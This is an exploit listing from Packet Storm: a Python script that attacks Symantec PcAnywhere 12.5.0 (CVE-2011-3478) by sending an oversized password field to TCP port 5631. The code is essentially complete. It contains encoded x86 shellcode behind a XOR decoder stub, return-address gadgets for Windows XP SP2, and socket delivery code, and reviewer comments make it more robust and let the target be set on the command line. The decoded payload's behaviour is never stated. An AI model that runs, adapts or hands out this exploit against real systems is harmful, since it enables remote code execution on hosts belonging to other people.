Symantec PcAnywhere 12.5.0 Buffer Overflow

2012-06-27T00:00:00
ID PACKETSTORM:114230
Type packetstorm
Reporter S2 Crew
Modified 2012-06-27T00:00:00

Description

                                        
                                            `#!/usr/bin/python  
  
# Exploit Title: Symantec PcAnywhere login and password field buffer overflow  
# Date: 2012.06.27  
# Author: S2 Crew [Hungary]  
# Software Link: symantec.com  
# Version: 12.5.0  
# Tested on: Windows XP SP2  
# CVE: CVE-2011-3478  
  
# Code :  
import socket  
import time  
import struct  
import string  
import sys  
  
# Encoded x86 payload (368 bytes) that is delivered inside the password field;
# init4 lays out `jmp` so that execution lands on the first byte below.
# The leading bytes read as fcmovu / fnstenv [esp-0xc] / pop eax / sub ecx,ecx /
# mov cl,0x56 / xor [eax+0x18],ebx / add ebx,[eax+0x18] -- i.e. a GetPC-based
# XOR decoder stub of the shikata-ga-nai kind -- so everything after it is
# encoded and reveals nothing about what the decoded payload actually does.
# NOTE(review): the payload's behaviour after decoding is documented nowhere
# in this file. Regenerate it yourself and verify it in an isolated lab before
# use; never run opaque shellcode copied from a listing.
shell = (
"\xda\xda\xbb\x9e\x7f\xfb\x04\xd9\x74\x24\xf4\x58\x2b\xc9"
"\xb1\x56\x31\x58\x18\x03\x58\x18\x83\xc0\x9a\x9d\x0e\xf8"
"\x4a\xe8\xf1\x01\x8a\x8b\x78\xe4\xbb\x99\x1f\x6c\xe9\x2d"
"\x6b\x20\x01\xc5\x39\xd1\x92\xab\x95\xd6\x13\x01\xc0\xd9"
"\xa4\xa7\xcc\xb6\x66\xa9\xb0\xc4\xba\x09\x88\x06\xcf\x48"
"\xcd\x7b\x3f\x18\x86\xf0\xed\x8d\xa3\x45\x2d\xaf\x63\xc2"
"\x0d\xd7\x06\x15\xf9\x6d\x08\x46\x51\xf9\x42\x7e\xda\xa5"
"\x72\x7f\x0f\xb6\x4f\x36\x24\x0d\x3b\xc9\xec\x5f\xc4\xfb"
"\xd0\x0c\xfb\x33\xdd\x4d\x3b\xf3\x3d\x38\x37\x07\xc0\x3b"
"\x8c\x75\x1e\xc9\x11\xdd\xd5\x69\xf2\xdf\x3a\xef\x71\xd3"
"\xf7\x7b\xdd\xf0\x06\xaf\x55\x0c\x83\x4e\xba\x84\xd7\x74"
"\x1e\xcc\x8c\x15\x07\xa8\x63\x29\x57\x14\xdc\x8f\x13\xb7"
"\x09\xa9\x79\xd0\xfe\x84\x81\x20\x68\x9e\xf2\x12\x37\x34"
"\x9d\x1e\xb0\x92\x5a\x60\xeb\x63\xf4\x9f\x13\x94\xdc\x5b"
"\x47\xc4\x76\x4d\xe7\x8f\x86\x72\x32\x1f\xd7\xdc\xec\xe0"
"\x87\x9c\x5c\x89\xcd\x12\x83\xa9\xed\xf8\xb2\xed\x23\xd8"
"\x97\x99\x41\xde\x06\x06\xcf\x38\x42\xa6\x99\x93\xfa\x04"
"\xfe\x2b\x9d\x77\xd4\x07\x36\xe0\x60\x4e\x80\x0f\x71\x44"
"\xa3\xbc\xd9\x0f\x37\xaf\xdd\x2e\x48\xfa\x75\x38\x71\x6d"
"\x0f\x54\x30\x0f\x10\x7d\xa2\xac\x83\x1a\x32\xba\xbf\xb4"
"\x65\xeb\x0e\xcd\xe3\x01\x28\x67\x11\xd8\xac\x40\x91\x07"
"\x0d\x4e\x18\xc5\x29\x74\x0a\x13\xb1\x30\x7e\xcb\xe4\xee"
"\x28\xad\x5e\x41\x82\x67\x0c\x0b\x42\xf1\x7e\x8c\x14\xfe"
"\xaa\x7a\xf8\x4f\x03\x3b\x07\x7f\xc3\xcb\x70\x9d\x73\x33"
"\xab\x25\x83\x7e\xf1\x0c\x0c\x27\x60\x0d\x51\xd8\x5f\x52"
"\x6c\x5b\x55\x2b\x8b\x43\x1c\x2e\xd7\xc3\xcd\x42\x48\xa6"
"\xf1\xf1\x69\xe3"
)
# First packet: four zero bytes, the initial handshake the service expects
# on TCP/5631 before it will talk to us.
init1 = "\x00" * 4
  
# Second packet; the server answers it with its "Enter username" prompt
# (the NTdialog message). "\r" is the same byte as the original "\x0d".
init2 = "\r\x06\xfe"
  
# Username field: one hundred 'A' characters. The author left a terminating
# "\r" commented out, so none is sent -- the username itself is not the
# overflowing field, the password packet (init4) is.
init3 = "".join(["A"] * 100)
  
# Every address goes on the wire as a 4-byte little-endian word (x86 stack).
_u32le = struct.Struct("<L")

# Address the author labels as readable on Windows XP SP2 -- presumably it
# only needs to be mapped when something dereferences it (XP SP2 specific,
# verify on any other build).
readable_xp_sp2 = _u32le.pack(0x023E5AD0)
# Address of a `call esi` gadget; the module it lives in is not stated and
# the value is tied to the tested XP SP2 install.
call_esi = _u32le.pack(0x67f7aac4)
# Little-endian this is EB 12 41 41: `jmp short +0x12` followed by two
# filler bytes. The 0x12 skips those 2 bytes plus the 16 bytes of pointers
# init4 places after it, landing exactly on the first byte of `shell`.
jmp = _u32le.pack(0x414112EB)
  
# Password field -- the packet that overflows. Byte offsets within it:
#   0     "B" * 1282        filler up to the slot the author overwrites
#   1282  jmp               EB 12 41 41 -> jmp short over the next 16 bytes
#   1286  readable_xp_sp2
#   1290  "DDDD"
#   1294  call_esi
#   1298  "AAAA"
#   1302  shell             decoder stub + encoded payload
#   ...   "E" padding
# NOTE(review): the padding term subtracts 1286 + 12, but the fixed prefix in
# front of `shell` is 1302 bytes (the trailing "AAAA" is not counted), so the
# packet is 4004 bytes rather than the 4000 the expression suggests. Left
# exactly as written: this length is presumably what was tested on 12.5.0.
_filler = "B" * 1282
_pivot = jmp + readable_xp_sp2 + "DDDD" + call_esi + "AAAA"
_padding = "E" * (4000 - 1286 - 12 - len(shell))
init4 = _filler + _pivot + shell + _padding
  
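# --- Delivery (Python 2 script; the packet constants above are 8-bit str) ---
# Target can be overridden on the command line:  python exploit.py HOST [PORT]
# The defaults keep the original hard-coded lab address, so existing usage
# is unchanged. Only run this against a host you are authorized to test.
target_host = sys.argv[1] if len(sys.argv) > 1 else "172.16.29.133"
target_port = int(sys.argv[2]) if len(sys.argv) > 2 else 5631

# The 5 s pauses between packets are the author's pacing for the service's
# login state machine and are kept unchanged.
STEP_DELAY = 5
# Bound every blocking call. Without a timeout a silent, firewalled or
# already-crashed target leaves connect()/recv() hanging forever; now such a
# case surfaces as socket.timeout instead.
IO_TIMEOUT = 30

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.settimeout(IO_TIMEOUT)
try:
    s.connect((target_host, target_port))

    print("init packet...")
    s.sendall(init1)          # sendall(): send() may write only part of a buffer
    time.sleep(STEP_DELAY)
    data = s.recv(1024)       # consume the reply before moving to the next step

    print("handshake packet...")
    s.sendall(init2)
    time.sleep(STEP_DELAY)
    data = s.recv(1024)

    print("username packet...")
    s.sendall(init3)
    time.sleep(STEP_DELAY)
    # No recv() here: the original deliberately does not read the prompt that
    # follows the username before sending the overflowing password packet.

    print("password packet...")
    s.sendall(init4)          # ~4 KB: a partial send() would truncate the payload
finally:
    s.close()                 # release the socket on success and on any error/timeout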
  
`